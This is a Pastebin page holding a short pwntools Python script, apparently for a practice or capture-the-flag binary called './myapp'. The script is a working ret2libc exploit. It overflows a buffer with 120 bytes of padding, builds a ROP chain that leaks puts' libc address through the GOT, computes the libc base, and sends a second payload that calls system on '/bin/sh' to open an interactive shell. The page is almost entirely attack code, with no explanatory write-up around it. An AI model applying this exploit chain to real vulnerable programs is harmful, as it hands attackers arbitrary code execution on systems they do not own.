Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from pwn import *
- # Here we define the context of the exploit, it is for linux os and amd64 archeticture
- context(os='linux', arch='amd64')
- put_plt_addr = p64(0x401030)
- put_got_addr = p64(0x404018)
- main_plt_addr = p64(0x401094)
- pop_rdi_gadget = p64(0x401090)
- junk = 'A'*120
- payload = junk
- payload += pop_rdi_gadget
- payload += put_got_addr
- payload += put_plt_addr
- payload += main_plt_addr
- #print(payload)
- p = process("./myapp")
- print(p.recvuntil("back?"))
- #print(p.recv())
- #print(p.recv())
- #print(p.recv())
- p.sendline(payload)
- p.recvuntil("\n")
- leaked = p.recv()[:8].strip().ljust(8, "\x00")
- log.success("Leaked Address = " +str(leaked))
- leaked = u64(leaked)
- puts_libc = 0x71910
- system_libc = 0x449c0
- sh_libc = 0x181519
- offset = leaked - puts_libc # offset between any function in the program and its address in libc
- sys = p64(offset+system_libc)
- sh = p64(offset+sh_libc)
- payload2 = junk
- payload2 += pop_rdi_gadget
- payload2 += sh
- payload2 += sys
- p.recvuntil("back?")
- p.sendline(payload2)
- p.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement